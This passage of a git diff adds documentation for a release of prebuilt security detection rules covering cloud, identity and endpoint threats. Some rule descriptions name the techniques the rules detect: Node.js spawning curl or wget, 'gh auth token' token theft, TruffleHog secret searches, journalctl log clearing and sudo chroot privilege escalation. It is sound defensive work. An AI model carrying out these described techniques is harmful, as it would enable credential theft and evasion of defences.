+include::prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc[] +include::prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc[] +include::prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc[] +include::prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc[] +include::prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc[] +include::prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc[] +include::prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc[] +include::prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc[] 
+include::prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc[] +include::prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc[] +include::prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc[] +include::prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc[] +include::prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc[] +include::prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc[] +include::prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc[] +include::prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc[] +include::prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc[] +include::prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc[] +include::prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc[] +include::prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc[] +include::prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc[] +include::prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc[] 
+include::prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc[] +include::prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc[] +include::prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc[] +include::prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc[] +include::prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc[] +include::prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc[] +include::prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc[] +include::prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc[] +include::prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc[] +include::prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc[] +include::prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc[] +include::prebuilt-rule-8-19-8-kill-command-execution.asciidoc[] +include::prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc[] +include::prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc[] +include::prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc[] +include::prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc[] +include::prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc[] +include::prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc[] +include::prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc[] +include::prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc[] +include::prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc[] +include::prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc[] diff --git 
a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc new file mode 100644 index 0000000000..15a92e94bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc @@ -0,0 +1,250 @@ +[[prebuilt-rule-8-19-8-prebuilt-rules-8-19-8-summary]] +[role="xpack"] +== Update v8.19.8 + +This section lists all updates associated with version 8.19.8 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<> | This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. | new | 1 + +|<> | Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. | new | 1 + +|<> | Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. | new | 1 + +|<> | Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. | new | 1 + +|<> | Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. | new | 1 + +|<> | Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. | new | 1 + +|<> | This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. 
This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. | new | 1
+
+|<> | This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. | new | 1
+
+|<> | This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". | new | 1
+
+|<> | This rule detects the execution of Node.js pre- or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. | new | 1
+
+|<> | Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. | new | 1
+
+|<> | Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. | new | 1
+
+|<> | This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. | new | 1
+
+|<> | Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijacking the execution flow of a process via thread priority manipulation. | new | 1
+
+|<> | Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. | update | 6
+
+|<> | Identifies a potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. | update | 7
+
+|<> | This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. | update | 3
+
+|<> | Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this is a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a new terms rule that looks for the first occurrence of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). | update | 3
+
+|<> | Identifies concurrent Azure sign-in events for the same user from multiple sources, where one of the authentication events has suspicious properties often associated with DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. | update | 3
+
+|<> | Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high-frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attempt to brute-force TOTP codes by generating several sessions and attempting to guess the correct code. | update | 5
+
+|<> | Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. | update | 107
+
+|<> | Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. | update | 3
+
+|<> | Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. | update | 5
+
+|<> | Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies.
| update | 3 + +|<> | Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. | update | 107 + +|<> | Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. | update | 106 + +|<> | Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. | update | 106 + +|<> | Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. | update | 108 + +|<> | Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. | update | 106 + +|<> | Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. | update | 106 + +|<> | Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. | update | 106 + +|<> | Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. | update | 106 + +|<> | Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. | update | 106 + +|<> | Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. | update | 106 + +|<> | Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. | update | 106 + +|<> | Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. 
| update | 106 + +|<> | Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. | update | 106 + +|<> | Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. | update | 106 + +|<> | Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. | update | 106 + +|<> | Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. | update | 106 + +|<> | Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. | update | 108 + +|<> | Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. | update | 108 + +|<> | Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). | update | 5 + +|<> | Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. | update | 109 + +|<> | Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. | update | 2 + +|<> | Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. 
This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. | update | 4
+
+|<> | Identifies suspicious activity reported by users in Microsoft Entra ID related to their accounts, which may indicate potential compromise or unauthorized access attempts. Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. | update | 3
+
+|<> | Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources on-behalf-of the user. | update | 218
+
+|<> | Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. | update | 4
+
+|<> | Identifies rare Azure Entra ID app IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. | update | 4
+
+|<> | Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. | update | 5
+
+|<> | Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice to avoid creating guest users. Guest users could be overlooked indefinitely, leading to a potential vulnerability. | update | 106
+
+|<> | Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. | update | 6
+
+|<> | This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may help identify unauthorized access or actions performed by compromised accounts. Adversaries may successfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. | update | 4
+
+|<> | Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. | update | 106
+
+|<> | Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. | update | 106
+
+|<> | Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. | update | 106
+
+|<> | In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. | update | 106
+
+|<> | Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. | update | 106
+
+|<> | Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator.
An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. | update | 108 + +|<> | Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. | update | 107 + +|<> | Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. | update | 4 + +|<> | Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. | update | 2 + +|<> | Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. | update | 107 + +|<> | Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. | update | 106 + +|<> | Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. | update | 106 + +|<> | Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. | update | 106 + +|<> | Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. 
Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. | update | 2 + +|<> | Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. | update | 210 + +|<> | Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. | update | 4 + +|<> | Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. | update | 2 + +|<> | Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. | update | 4 + +|<> | Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. | update | 211 + +|<> | Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. | update | 210 + +|<> | Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. | update | 210 + +|<> | Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. | update | 210 + +|<> | Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. | update | 210 + +|<> | Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. 
